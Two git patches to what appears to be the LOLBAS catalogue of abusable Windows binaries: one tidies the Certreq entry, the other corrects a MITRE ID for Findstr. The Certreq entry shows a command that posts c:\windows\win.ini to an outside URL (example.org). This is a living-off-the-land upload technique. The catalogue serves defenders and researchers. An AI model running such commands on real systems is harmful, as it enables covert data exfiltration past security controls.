From ce53e1376ae6e940d409edd627ca2598845fc43f Mon Sep 17 00:00:00 2001 From: Bjarne <83133360+BjarneVerschorre@users.noreply.github.com> Date: Sat, 17 Feb 2024 18:14:08 +0100 Subject: [PATCH 1/2] Moved text to correct line (#349) Moved "and show response in terminal" from `Command` to `Description` --- yml/OSBinaries/Certreq.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 1200042..cd01a66 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -11,8 +11,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal - Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST + - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini + Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal Usecase: Upload Category: Upload Privileges: User From 23bf33c7c4b58d7815c8423d24f39daae6110509 Mon Sep 17 00:00:00 2001 From: j00c3 Date: Sat, 17 Feb 2024 11:30:52 -0600 Subject: [PATCH 2/2] Update MITRE T1185 to T1105 (#345) --- yml/OSBinaries/Findstr.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index c401a68..31c3af5 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -30,7 +30,7 @@ Commands: Usecase: Download/Copy file from webdav server Category: Download Privileges: User - MitreID: T1185 + MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\findstr.exe